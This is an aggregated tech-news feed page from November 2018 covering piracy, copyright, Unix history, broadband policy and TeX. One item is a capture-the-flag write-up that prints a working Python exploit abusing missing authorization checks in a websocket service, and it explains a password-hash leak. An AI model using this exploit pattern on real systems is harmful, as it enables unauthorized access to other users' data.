There’s no suggestion at all that GOG is involved in the cracking of Denuvo, of course, but the FCKDRM group are using GOG’s FCKDRM logo when announcing releases, which certainly has the potential to confuse casual pirates.

Hitman 2’s Denuvo Protection Cracked Three Days Before Launch [Andy/Torrentfreak]

13:49

Four short links: 12 November 2018 [All - O'Reilly Media]

Gov Open Source, Bruce Sterling, Robot Science, and Illustrated TLS 1.3

  1. FDA MyStudies App -- open source from government, designed to facilitate the input of real-world data directly by patients which can be linked to electronic health data supporting traditional clinical trials, pragmatic trials, observational studies, and registries.
  2. Bruce Sterling Interview -- on architecture, design, science fiction, futurism, and involuntary parks. (via Cory Doctorow)
  3. Inventing New Materials with AI (MIT TR) -- using machine learning to generate hypotheses for new materials, to be explored and tested by actual humans.
  4. The New Illustrated TLS Connection -- Every byte explained and reproduced. A revised edition in which we dissect the new manner of secure and authenticated data exchange, the TLS 1.3 cryptographic protocol.

Continue reading Four short links: 12 November 2018.

Four short links: 9 November 2018 [All - O'Reilly Media]

Counting Computers, New Software, Unix History, and Tencent Framework

  1. How Many Computers Are In Your Computer? -- So, a desktop or smartphone can reasonably be expected to have anywhere from 15 to several thousand computers in the sense of a Turing-complete device which can be programmed and which is computationally powerful enough to run many programs from throughout computing history and which can be exploited by an adversary for surveillance, exfiltration, or attacks against the rest of the system. Which is why security folks sometimes sleep poorly at night.
  2. Some Notes on Running New Software in Production (Julia Evans) -- The playbook for understanding the software you run in production is pretty simple. Here it is: (1) Start using it in production in a non-critical capacity (by sending a small percentage of traffic to it, on a less critical service, etc); (2) Let that bake for a few weeks. (3) Run into problems. (4) Fix the problems. Go to step 3.
  3. Unix History (Rob Pike) -- know your past.
  4. Omi -- Tencent's ext generation web framework in 4KB JavaScript (Web Components + JSX + Proxy + Store + Path Updating).

Continue reading Four short links: 9 November 2018.

13:28

An illustrated tour of Unix history [Cory Doctorow – Boing Boing]

Unix pioneer Rob Pike was there from the start, physically transporting key elements of the "Toronto distribution" of Unix to Berkeley when he started grad school, and then to Bell Labs, working alongside Dennis Ritchie and other key Unix programmers to develop and refine everything from modern editors to compilers to windowing systems.

His hour-long "illustrated memoir" of the deep history of Unix is delightful, touching on the people and institutional forces that shaped the operating environment that has come to dominate modern computing (he even gives a mention to Cardiac, the cardboard computer that shaped my own computing life).

And beyond being fascinating, this is also very funny: those early pioneers were very playful and prone to pranking each other in ways that remain very relatable, even all these years later. Pike is a very good presenter, and his Zelig-like presence at so many key moments in our shared digital history makes this a tale worth telling, and watching.

(via Four Short Links)

How many computers are in your computer? [Cory Doctorow – Boing Boing]

Gwern Branwen asks the deceptively simple question "How many computers are in your computer?"

Having defined "computer" as "a Turing-complete device which can be programmed in a usefully general fashion with little or no code running on the 'official' computer," Branwen enumerates the crazily large number of systems in your phone, laptop or server that qualify -- which may seem like a mere exercise.

But that's where the other half of Branwen's definition comes in: a computer "is computationally powerful enough to run many programs from throughout computing history and which can be exploited by an adversary for surveillance, exfiltration, or attacks against the rest of the system."

In other words, every one of these computers is a potential weak point in your "computer"'s security.

For a lot of people, BadUSB was a wake-up call on this, and then Bloomberg's controversial story about tiny backdoor chips in server hardware came as an important reminder about all the ways that a computer can be compromised.

But Branwen's list goes so far beyond these components as to be dizzying and somewhat demoralizing. Attacks on any of these "Turing-complete device[s] which can be programmed in a usefully general fashion" represent a huge blind spot in contemporary computer security.

You might think you have just the one large CPU occupying pride of place on your motherboard, and perhaps the GPU too, but the computational power available goes far beyond just the CPU/GPU, for a variety of reasons: transistors and processor cores are so cheap now that it often makes sense to use a separate core for realtime or higher performance, for security guarantees, to avoid having to burden the main OS with a task, for compatibility with an older architecture or existing software package, because a DSP or core can be programmed faster than a more specialized ASIC can be created, or because it was the quickest possible solution to slap down a small CPU and they couldn’t be bothered to shave some pennies. Further, many of these components can be used as computational elements even if they were not intended to be or hide that functionality. (For example, I believe I’ve read that the Commodore 64’s floppy drive’s CPU was used as a source of spare compute power & defeating copy-protection schemes.)

How many computers are in your computer? [Gwern Branwen]

(via Four Short Links)

The market failed rural kids: poor rural broadband has created a "homework gap" [Cory Doctorow – Boing Boing]

America's commitment to market-based broadband -- fueled by telcom millions pumped into campaigns against public broadband provision -- has left rural Americans without access to the broadband they need to fully participate in twenty-first century life, with students among the hardest-hit victims of broadband deprivation.

The FCC can fix this. Across the country, "whitespace" spectrum (used to buffer licensed broadcasters from overlapping signals in adjacent territories) was historically allocated for rural educational TV broadcasts. When these didn't materialize, the spectrum was reclassified for wireless internet and the FCC started parceling it off to telcos, taking it away from the schools that could use it to connect their kids to the internet.

Many of these schools are on publicly operated, state-funded fiber loops, and could erect their own towers that students could use to connect to the internet over high-speed fixed wireless links, but only if the FCC gives the educational sector access to that educationally earmarked spectrum.

A recent FCC proceeding was flooded both by comments from educator technologists describing the educational costs of the homework gap and promising to remediate this gap by rolling out fixed wireless; and comments from telcoms lobbyists, representing the companies that have so significantly failed rural America, promising that if they get the school spectrum allocated to them, they'll do better this time.

With Trump's FCC in the hands of dingo babysitters like Ajit Pai, who want to end all public provision of network service and hand everything over to big telco, things look grim for rural American kids.

In the meantime, some teachers at Panguitch High School are moving more of their classroom work online. “Given the expectations we now have for student access, it’s difficult for those students who don’t have good internet at home,” said the school’s principal, Russell Torgersen. He’s seen the students sitting in the school parking lot to tap the Wi-Fi on weekends, and he’s had many conversations with teachers about how to work around students’ spotty home connections.

For now, it’s a waiting game, as the FCC plods toward a decision on the fate of the EBS spectrum. Given the uncertainty, Eyre and his allies are looking at alternative paths to spectrum licenses, such as the lengthy and complex FCC waiver process successfully used to create a rural educational broadband network in Michigan’s Upper Peninsula.

Even if the FCC ultimately decides to give new EBS spectrum licenses to rural school districts like Garfield County, it’s hard to say how much of the homework gap could then be eliminated. Current estimates of rural broadband don't take into account the boundaries of EBS whitespace, nor the fact that a home broadband connection can be inadequate for a school network's needs, according to digital-inclusion advocates such as Susan Bearden, chief innovation officer for the Consortium for School Networking (CoSN), a professional association for school technology leaders.

Rural Kids Face an Internet 'Homework Gap.' The FCC Could Help [Chris Berdik/Wired]

12:49

Chris Lamb: Review: The "Trojan Room" coffee [Planet Debian]

I was recently invited to give a seminar at the Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background, to save hackers in the building from finding the coffee machine empty, a camera was setup on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001 what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in myself? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

12:42

Britons! Tell the UK government that the compulsory porn-viewing logs need compulsory privacy standards [Cory Doctorow – Boing Boing]

The British government has decreed that adult sites must collect age-verification data on everyone who looks at material rated for 18-and-over viewing; this amounts to a database of the porn-viewing habits of every adult in the UK.

While this logging is compulsory, compliance with privacy protections is optional.

The Open Rights Group has a form where you can contact the government and demand that they make privacy protection mandatory and integral, not optional and an afterthought.

* We are grateful to the BBFC and the DCMS for recognising that Age Verification technology needs strong privacy protection.

* The BBFC’s voluntary privacy scheme is an improvement, but companies can simply ignore the guidance.

* Protecting the public’s digital privacy should not be optional. Strong privacy protections for Age Verification technology must be made compulsory.

* The implementation of Age Verification technology must be delayed until privacy protections are mandatory.

* Major data breaches make headlines on a regular basis. Strong privacy protection must be a priority, not an afterthought.

Making Age Verification privacy rules matter [Open Rights Group]

12:35

Hiding Secret Messages in Fingerprints [Schneier on Security]

This is a fun steganographic application: hiding a message in a fingerprint image.

Can't see any real use for it, but that's okay.

12:07

CodeSOD: To Round a Corner [The Daily WTF]

Last week we saw an attempt to reinvent the ceil function. Tina raised a protest: "6 lines to re-implement a ceil function? We can do better." //Rounds to 1000d Superior public int...

10:21

Feeds | Open Community Metrics and Privacy: MozFest18 Recap [Planet GridPP]

Open Community Metrics and Privacy: MozFest18 Recap s.aragon 12 November 2018 - 9:19am

By Raniere Silva, Software Sustainability Institute, and Georg Link, University of Nebraska at Omaha. Open communities lack a shared language to talk about metrics and share best practices. Metrics are aggregate information that summarise raw data into a single number, stripping away any context of data. Pedagogical metric displays are an idea for metrics that include an explanation and educates the user on how to interpret the metric. Metrics are inherently biased and can lead to discrimination. Many problems brought up during the MozFest session are worked on in the CHAOSS project.

09:42

The magnetic generosity of the network effect [Seth's Blog]

If you share a pizza with a large crowd, no one will be very satisfied.

But if you share an idea with a group, it creates cultural impact and becomes more valuable as it spreads, not less.

Most of the time, we adopt the scarcity model of pizza. “I don’t have that much, and if I share it with you, I won’t have any left…”

But in fact, the useful parts of our life are better characterized as, “If I share it with you, we’ll both have it.”

An idea shared is more powerful than one that’s hidden. A technology standard outperforms a proprietary one. A community is stronger than divided individuals ever could be.

When you give away your work by building the network, you’re not giving it away at all.

You’re building trust, authority and a positive cycle of better.

08:56

Hitman 2’s Denuvo Protection Cracked Three Days Before Launch [TorrentFreak]

Protecting video games from piracy has become big business over the years. The latest games consoles from Sony and Microsoft appear relatively secure but the same cannot be said about PC titles.

Due to the fact that PC games are loaded onto a platform that is instantly accessible to hackers, it’s almost inevitable that any games worth having will have their piracy protections removed at some point and leak online for all to download.

The company on the anti-piracy frontlines is Denuvo. Its anti-tamper technology is fiendishly difficult to crack and as such it regularly finds its way on to many of the gaming world’s most cherished titles. However, Denuvo is not infallible so regularly finds itself targeted by crackers.

This weekend, the technology suffered yet another disappointing blow. The long-awaiting stealth game Hitman 2 – which comes ‘protected’ by the latest variant of Denuvo (v5.3) – leaked online. Aside from having its protection circumvented, this happened three days before the title’s official launch on November 13.

It appears that a relatively new cracking group called FCKDRM (more on them in a moment) obtained a version of Hitman 2 that was only available to those who pre-ordered the game. There are some reports of the crack failing at times on some machines but nevertheless, this leak is important on a number of fronts.

Firstly, the game leaked online three days early, rendering the protection when the game finally comes out much less useful. Secondly, presuming the original copy of the game was obtained on Friday when the pre-order copy was delivered, it took just a single day for the group to crack Denuvo’s latest protection.

Considering an announcement made by Denuvo just last week, this is a pretty embarrassing turn of events. Denuvo’s aim is to protect games in their initial release window and according to the company, having no protection can result in millions of dollars in potential lost revenue in just a couple of weeks.

To be on the safe side, however, the company also highlighted the importance of protecting games for just four days (notably a couple of Denuvo-protected titles recently withstood attack for the same number period). Winding back further still, the company said that even providing protection for an hour is worthwhile. Clearly, minus three days didn’t figure into Denuvo’s plans.

While several groups have been chipping away at Denuvo for some time, FCKDRM is a new entrant (at least by branding) to the cracking scene. Notably, FCKDRM isn’t a ‘Scene’ group but one that works in P2P circles. At least for now, their identities remain a secret but their choice of name is interesting.

FCKDRM is the official name for the anti-DRM initiative recently launched by GOG, a digital distribution platform for DRM-free video games and video.

There’s no suggestion at all that GOG is involved in the cracking of Denuvo, of course, but the FCKDRM group are using GOG’s FCKDRM logo when announcing releases, which certainly has the potential to confuse casual pirates.

Given that Denuvo 5.3 was cracked so quickly (some crashing issues aside) it raises questions about other upcoming titles set to use similar technology. They include Battlefield V from EA/DICE, which has its official full release on November 20 but is already available to early access players.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Top 10 Most Pirated Movies of The Week on BitTorrent – 11/12/18 [TorrentFreak]

This week we have three newcomers in our chart.

Mission: Impossible – Fallout is the most downloaded movie.

The data for our weekly download chart is estimated by TorrentFreak, and is for informational and educational reference only. All the movies in the list are Web-DL/Webrip/HDRip/BDrip/DVDrip unless stated otherwise.

RSS feed for the articles of the recent weekly movie download charts.

This week’s most downloaded movies are:
Movie Rank Rank last week Movie name IMDb Rating / Trailer
Most downloaded movies via torrents
1 (…) Mission: Impossible – Fallout 8.0 / trailer
2 (1) The Equalizer 2 6.9 / trailer
3 (2) The Meg 5.9 / trailer
4 (3) Incredibles 2 8.0 / trailer
5 (5) Mile 22 6.1 / trailer
6 (…) Outlaw king 7.1 / trailer
7 (6) Alpha 6.9 / trailer
8 (4) The Nun (subbed HDRip) 5.7 / trailer
9 (…) Kin 5.6 / trailer
10 (9) BlacKkKlansman 7.7 / trailer

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

1243 [LFG Comics]

The post 1243 appeared first on Looking For Group.

1241 [LFG Comics]

The post 1241 appeared first on Looking For Group.

1240 [LFG Comics]

The post 1240 appeared first on Looking For Group.

1239 [LFG Comics]

The post 1239 appeared first on Looking For Group.

1238 [LFG Comics]

The post 1238 appeared first on Looking For Group.

08:35

Swapped, p1 [Ctrl+Alt+Del Comic]

Last day for the posters. Closing orders at midnight. If we have any extras (since I have to print them at a round number), they’ll go up at a later date, but they won’t be signed.

05:49

Girl Genius for Monday, November 12, 2018 [Girl Genius]

The Girl Genius comic for Monday, November 12, 2018 has been posted.

05:00

Indie Rock Bottom [Diesel Sweeties webcomic by rstevens]

this is a diesel sweeties comic strip

In tonight’s comic, Indie Rock Pete hits Indie Rock Bottom:

03:07

Link [Scripting News]

Ray Ozzie used ThinkTank to write the spec for Lotus Notes.

02:42

Norbert Preining: TeXConf 2018 – the meeting of the Japanese TeX Users [Planet Debian]

On Saturday I attended the yearly meeting of the Japanese TeX Users, TeXConf 2018, which this year took place in Sapporo, Hokkaido. Since there is loads of information in Japanese on this meeting, I give a short summary of the talks in English.

Having attended several international TeX conferences, I am always surprised how many Japanese TeX users find their way to this yearly meeting. This year we were about 50 participants. We had five full talks and two lightning talks, followed by a very enjoyable dinner and after-party.

The first talk was by Takuto ASAKURA (朝倉卓人) on llmk – The Light LaTeX Make (slides). Takuto gave a short overview on the available TeX make alternatives and why he saw the need for a new tool, which is written in texlua. After some short examples of usage he mentioned a few advanced usage scenarios. He will write an article for the TUGboat and plans to present llmk at the TUG conference 2019 in the US. As an old-school guy I prefer make, which is by far more powerful, but I welcome additions to make building TeX documents easier. My only wish would be a “no-markup-do-your-best” build system – guess I will start writing my own 😉

Next up was my own talk on Continuous Integration Testing for TeX Live (slides), where go into the nitty-gritty details of DevOps for TeX Live – mirroring the Subversion repos into git, and linking them to CI services, as well as using deployments to get binaries back. I hope to have an article about this ready for the next TUGboat.

After lunch, Takashi SUWA (諏訪 敬之) presented his work on a new typesetting system with a static type system, SATySFi. With his background on formal verification Takashi took an interesting approach to type-setting. Due to the complete static typing of the input source, error messages can be much more informative – one of Takashi’s biggest complaints with current TeX, but it also makes the input format a bit bothersome in my opinion. For me one of the biggest achievements of DEK is the definition of a no-thrills easy to read and write input format for mathematics. Takashi has also written an book documenting SATySFi, and I have urged him to make an English translation.

The next talk was by Keiichiro ISHINO (石野恵一郎) on Breaking Paragraphs into Lines with the AHFormatter, a commercial typesetting program targetting businesses with XSL-FO, CSS, XML,.. formatting abilities. It was very interesting to see how commercial products deal with the very same problems we are facing.

Hironori KITAGAWA (北川弘典) reported on the state of luatex-ja (slides), in particular his work on line adjustments in the presence of inline math formula, as well as usage of the luatex-fontspec sub-package. I cannot repeat it again and again, I consider this package one of the most important and is in daily use on my side.

The day closed with two lightening talks, first was by Keiichiro SHIKANO (鹿野桂一郎) on the usage of Encapsulated PostScript (eps) files in TeX (slides). Unfortunately, he didn’t really rehearse his talk and his time was over before it got interesting 😉 Fortunately we can read his slides online.

The last talk was Hironobu YAMASHITA (山下弘展) on How to become happy when typesetting Japanese with LaTeX (slides). A very funny and informative talk on the incredible work Hironobu is doing for the TeX community – development of large amount of packages, support and updates of the source code of several programs, the list is long.

I love to attend TeX meetings, and the Japanese TeXConf is in particular always interesting, in particular because TeXies here have a tendency to be rather tech savvy, one could even say \expandafter-maniac. This was in fact the biggest complaint during our walk to the dinner location, that there weren’t enough mentioning of \expandafter in the talks.

It is now nearly ten years that I attend the Japanese TeX User meetings, and I think we have come a long way – from a rather separate group of TeX developers and users distributing their stuff on Japanese only wikis and private pages, to a group that is now very strongly integrated in our global TeX community (TUG conference in Tokyo) as well as contributing to many projects. Thanks a lot!

02:28

Pale Blue Dot [QC RSS]

I miss Carl Sagan

00:42

Kernel prepatch 4.20-rc2 [LWN.net]

The 4.20-rc2 kernel prepatch is out for testing. "Fairly normal week, aside from me traveling".

Sunday, 11 November

22:49

Pro-Copyright Bias is Alive, Well, and Still Hiding the Full Story [TorrentFreak]

In 2007, the movie The Man From Earth leaked on file-sharing networks, with unexpected results. Instead of proving nothing but damaging, the title gained almost universal praise, rocketing the sci-fi flick to stardom via word-of-mouth advertising.

Director Richard Schenkman and producer Eric Wilkinson embraced the development and enthused over the attention their work was receiving online. Given the positive experience, during January 2018 the team deliberately ‘leaked’ the sequel – The Man from Earth: Holocene – on The Pirate Bay.

Given that filmmakers tend to view piracy as the enemy, TorrentFreak enthusiastically reported both events. Sadly, we had less positive news to convey this week when, out of the blue, Schenkman published an article on the site of pro-industry, anti-piracy alliance CreativeFuture, in which he heavily criticized piracy.

There can be little doubt that the piece was a gift to CreativeFuture and everyone who viewed Schenkman and Wilkinson’s place in the piracy debate as something positive for unauthorized sharing. The movie’s story had become a ray of light and here it was being shredded, a disastrous episode from which nothing good had come.

At TorrentFreak, however, we had our doubts about the tone of the piece. Never before had we seen such a turnaround, particularly when reviewing all previous correspondence with Schenkman. Something didn’t add up.

Mainly due to timezone differences, Schenkman responded to our questions after our article was published. However, his responses only served to increase our suspicions that what had been published on CreativeFuture wasn’t representative of his overall position on piracy.

First of all, Schenkman was rightfully furious about his movie being distributed in Russia after being professionally dubbed, with his donation requests removed from the resulting copy. That, most people will agree, is a flat-out insult to someone who has bent over backward to accommodate piracy.

He had every right to be annoyed but it’s worth noting that his anger was directed at one site, not necessarily pirates in general. In fact, Schenkman told us that plenty of positives have come out of the releases of both movies.

“The only reason that people all over the world knew and loved the original ‘Man from Earth’ was because of piracy, so while I’m disappointed that we’ve (still) made so little money from the first film, I’m deeply grateful that so many people have been able to see my movie,” he told TF this week.

“I’m still quite enthusiastic about, and deeply grateful for, the thousands of people who have written to us with kind words about the films, and who have made donations, large or small,” he added.

“I well understand that once we released the movie into the pirate ecosystem, nobody was under any obligation whatsoever to send us one penny, so the fact that so many have made donations is stunning to me, and I’ll never cease to be appreciative and impressed by the number of people who embraced the honor system. And luckily, donations continue to come in every day.”

For those wondering whether Schenkman’s piece in CreativeFuture and his comments to us might’ve been penned by a different author, assumption forgiven. From our contacts with him in 2007 right through to the present day, we have found Schenkman to be an honest man and a pleasure to deal with. He has never said anything to suggest that piracy is an “existential threat” to creators as mentioned in his piece. So why the sudden negativity?

We all know that life events can shape perceptions, so when the movie’s website and donation portal were hacked around six weeks ago, things began to take a turn for the worse. No revenue for weeks (and thousands in costs to bring it back) appear to have negatively affected the experience for the director. Then other types of piracy happened, ones that ensured that donations would be reduced.

“I learned that there were other people who ignored our requests to share only the version we uploaded, and ripped the movie from BluRay, so that there are versions floating around without my donation preface, even though we DID upload a full HD (BD quality) version of the picture,” Schenkman told TorrentFreak.

Even given the above events, however, the piece in CreativeFuture appears unnecessarily one-sided for a man who still had confidence in the piracy ecosystem a few months ago. Indeed, Schenkman told us this week that his team planned hard for the ‘pirate’ release of Holocene.

“In the case of the new film, we worked for months to promote awareness, so that there would be a groundswell of interest from fans of the original film. I would say that this effort at least partially worked,” he explained.

“In the first week of the pirate release, many thousands of people a day downloaded it, so there was a clear pent-up demand. And we’ve seen more donations come from the ‘Holocene’ release than we ever did from [Man From Earth] alone. So yes, in that sense, the ‘authorized leak’ of the new film has definitely helped spread awareness.

“The movie would have been pirated regardless; by doing it ourselves, we were, to some degree, able to control the narrative, and indeed it became more of a ‘story’, just the same way that ‘producers thank pirates’ became a story at the time of the original film’s release,” he added.

In a long email exchange, Schenkman told us that plenty of fans who didn’t even particularly like his sequel contacted him to congratulate him on choosing the honor system, while donating $5 as a ‘thank you’.

“You’d be surprised at how many of those messages I’ve gotten,” he told us.

But while Schenkman might be surprised at this generosity, we certainly aren’t surprised that none of this came out in the CreativeFuture piece.

It’s understandable that CreativeFuture want to fight their corner with a flawless, polished, and invulnerable anti-piracy narrative, but thankfully we aren’t afraid of calling out both sides of this war, when it’s called for. People deserve that honesty.

For example, Schenkman wanted to speak about some of his frustrations with movie distribution in his article. He believes that the international distribution system is flawed because there isn’t an efficient and fair commercial way to make an indie movie available everywhere, on the same day, unless Netflix buys it.

Those sentiments didn’t make the CreativeFuture piece but we’re happy to let him have a voice here.

“Even now, there isn’t a fair, equitable way for an indie filmmaker like me to make their movie available everywhere around the world at once. Even Amazon, which is in virtually every country, doesn’t allow you to simply upload your movie and with the click of a button make it available everywhere,” he says.

“I think they’ll eventually get there, but not anytime soon. If Netflix buys your movie, great — but if they don’t, you’re back to the antiquated system of going to international film markets and trying to sell you film country by country, a costly, inefficient, and time-consuming process (and again, you’re totally at the mercy of the ‘gatekeepers’).

“When we first released ‘Holocene’ we also made it available at Vimeo and MovieSaints, two platforms which allow access to viewers from most countries. Moviesaints has a unique system allowing both for a partial refund if you don’t like the movie, as well as a ‘tip the filmmaker’ function if you want to provide more support,” he adds.

And then comes an even stronger hint as to why Schenkman’s important comments didn’t make his own article.

“While we’ve seen revenue from both of these platforms, it doesn’t approach the total we’ve earned from donations. So the good news is that thousands of people who watched ‘Holocene’ via the pirate ecosystem have kindly, generously made donations to help support independent film,” he says.

Of course, in the interests of fair reporting we’re absolutely unafraid of publishing the not-so-good news too, so here it is – warts and all.

“The bad news is that hundreds of thousands (or millions) more have not, and thus we are still a long way from breaking even on this very low-budget movie. I really don’t see a sustainable business model for a truly independent filmmaker creating these kinds of thoughtful, serious movies, although I remain open to ideas!” Schenkman concludes.

While CreativeFuture are absolutely entitled to publish whatever they see fit on their own site, it seems clear from Schenkman’s article (and his comments to us spanning more than a decade) that they are only interested in a tightly-controlled narrative that leaves room for criticism of piracy, but none to detail some of the self-inflicted reasons behind much of it.

Piracy is certainly controversial and it can be bad, we’ve acknowledged as much in this piece. But hiding important parts of the full story – especially when they highlight flaws in the distribution system that contributes to piracy’s existence – is just as corrosive.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

19:42

MPAA: Switzerland Remains “Extremely Attractive” For Pirate Sites [TorrentFreak]

While the European Union has worked hard to strengthen its copyright laws in recent years, one country in the heart of the continent chooses its own path.

Switzerland is not part of the EU, which means that its policies deviate quite a bit from its neighbors. According to Hollywood, that’s not helping creators.

Responding to recent submission to the United States Trade Representative (USTR), the MPAA has identified several foreign “trade barriers” around the world. In Hollywood’s case, many of these are related to piracy.

One of the countries that’s highlighted, in rather harsh terms, is Switzerland. According to the MPAA, the country’s copyright law is “wholly inadequate” which, among other things, makes it “extremely attractive” to host illegal sites.

“Switzerland’s copyright law is wholly inadequate, lacking crucial mechanisms needed for enforcement in the digital era,’ MPAA writes.

“Switzerland lacks meaningful remedies and effective enforcement against online copyright infringement. Switzerland’s inadequate legal framework and robust technical infrastructure make it an extremely attractive host for illegal sites.”

One of the concerns is that the Swiss currently have no requirement for Internet services to remove infringing content. In addition, services can’t be held liable for infringements of customers.

The Hollywood group says this should change, adding that it also wants ISPs to aid their piracy battle, and to make sure that “copying” from unauthorized sources is outlawed. The MPAA proposes several changes the Swiss should implement, which include:

1) Ensuring liability under Swiss law for parties who facilitate, encourage, and profit from widespread infringement
2) Engaging ISPs in the fight against online piracy
3) Affirming that current law does not permit copying from unauthorized sources
4) Implementing adequate civil and criminal enforcement tools

While this sounds like a rather pressing matter, these recommendations and the associated problems are far from new. The MPAA’s submission does at times read like a broken record, using the exact same language as four years ago, as seen below.

From the MPAA’s 2014 report

These ‘copied’ sections appear throughout the report, also affecting other countries. For example, Hollywood still wants tougher penalties for Australian camcording pirates, using the same text as in 2014.

This suggests that, in some cases, no progress has been made at all. In Switzerland, however, that’s not the case.

With a new copyright law proposed last year, the Swiss aim to address the critique.

For example, the country addresses the hosting problem by introducing a “take-down-and-stay-down” policy. Internet services will be required to remove infringing content from their platforms and prevent that same content from reappearing. Failure to comply will result in prosecution.

In addition, the controversial Logistep ruling, which prevents companies from harvesting the IP addresses of file-sharers, will also be addressed.

The MPAA is far from impressed though. In a freshly written paragraph, it notes that the new law is still insufficient.

The Hollywood group explains that under the proposed law it will remain legal for people to download or stream pirated content privately, while website blocking remains unavailable.

“The draft Copyright Act shows significant shortcomings and will not significantly improve copyright protection. The Swiss government has refused to introduce basic elements of internationally accepted anti-piracy legislation into Swiss law,” the MPAA writes.

“For instance, the government dropped any access blocking mechanisms from the draft. Instead of proposing a legal source requirement for private use, the draft cements the understanding that private use of illegal sources is permitted.”

It’s clear that Hollywood is not happy with how things are going in Switzerland, and it hopes that the US Government can help to steer things in the right direction.

Unless that happens, we might see the same text appear again in the years to come. Copied from an authorized source, of course.

A copy of the MPAA’s comments is available here (pdf).

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

17:42

Today in GPF History for Sunday, November 11, 2018 [General Protection Fault: The Comic Strip]

Colonel Barker contemplates how future generations will perceive his actions...

16:35

Christoph Egger: RuCTFe 2018 laberator [Planet Debian]

Team: FAUST
Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

Webservice written in go. Has some pretty standard functionality (register, login, store a string) with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. Also the phrase stored when creating the account was used to store some more flags.

Client side authentication for labels

Gem from the viewLabel javascript function. For some reason the label's owner is checked client-side after the data was already returned to the client.


            let label = JSON.parse(e.data);
            if (label.Owner !== getLoginFromCookies()) {
                return;
            }

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access priviledges. As long as you have any valid session and can figure out websockets you can get about any label you like.


        "view": func(ex *CommandExecutor, data []byte) ([]byte, error) {
                var viewData ViewData
                err := json.Unmarshal(data, &viewData)
                if err != nil {
                        return nil, createUnmarshallingError(err, data)
                }
                cookies := parseCookies(viewData.RawCookies)
                ok, _ := ex.sm.ValidateSession(cookies)
                if !ok {
                        return nil, errors.New("invalid session")
                }
                label, err := ex.dbApi.ViewLabel(viewData.LabelId)
                if err != nil {
                        return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId))
                }
                rawLabel, err := json.Marshal(*label)
                if err != nil {
                        return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label))
                }
                return rawLabel, nil
        },

Putting things together. The exploit builds an fresh account. It generates some label (to figure out the ID if the most recent labels) and then bulk loads the last 100 labels

#!/usr/bin/env python3

import requests
import websocket
import json
import sys
import string
import random
import base64


def main():
    host = sys.argv[1]
    session = requests.session()

    password = [i for i in string.ascii_letters]
    random.shuffle(password)

    username = ''.join(password[:10])
    phrase = base64.b64encode((''.join(password[10:20])).encode()).decode()
    password = base64.b64encode((''.join(password[20:36])).encode()).decode()


    x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' %   
                    (host,username,phrase,password))
    x = session.get('http://%s:8888/login?login=%s&password=%s' % 
                    (host,username, password))
    raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid'])

    ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))

    data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)}))
    # make sure create is already commited before continuing
    ws.recv()

    data = {'Offset': 0, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)}))
    stuff = json.loads(ws.recv())
    lastid = stuff[0]['ID']

    for i in range(0 if lastid-100 < 0 else lastid-100, lastid):
        ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
        try:
            data = {'LabelId': i, 'RawCookies': raw_cookie}
            ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)}))
            print(json.loads(ws.recv())["Text"])
        except Exception:
            pass


if __name__ == '__main__':
    main()

Password Hash

The hash module used is obviously suspect. consists of a binary and a wrapper, freshly uploaded to github just the day before. Also if you create a test account with an short password (say, test) you end up with an hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with an 16 character hash that is identical. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:

[{"ID":2,"Login":"test","PasswordHash":"dGVzdFRpAm1IkZZVXEmK3Q==","Phrase":{"ID":0,"Value":""}}]

See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.


        "last_users":  func(ex *CommandExecutor, _ []byte) ([]byte, error) {
                users := ex.dbApi.GetLastUsers()
                rawUsers, err := json.Marshal(*users)
                if err != nil {
                        return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users))
                }
                return rawUsers, nil
        },

So call last_users (doesn't even need a session), for all the last 20 users log in and just load all the labels. Good thing passwords are transfered base64 encoded, so no worrying about non-printable characters in the password hash.

Additionally sessions were generated with the broken hash implementation. This probably would have allowed to compute session ids.

15:42

Link [Scripting News]

Todo: List of likers should be reverse chronologic. Done.

Link [Scripting News]

We need to train huge numbers of Americans in the basics of journalism.

14:56

Link [Scripting News]

BTW, not every post has the Like option. I have to set an flLikeable attribute on the post to true in order for the Like to be generated by the JavaScript code that runs in the page.

Tweet chat with Om [Scripting News]

I just had a brief chat with Om on Twitter. Here's what I said.

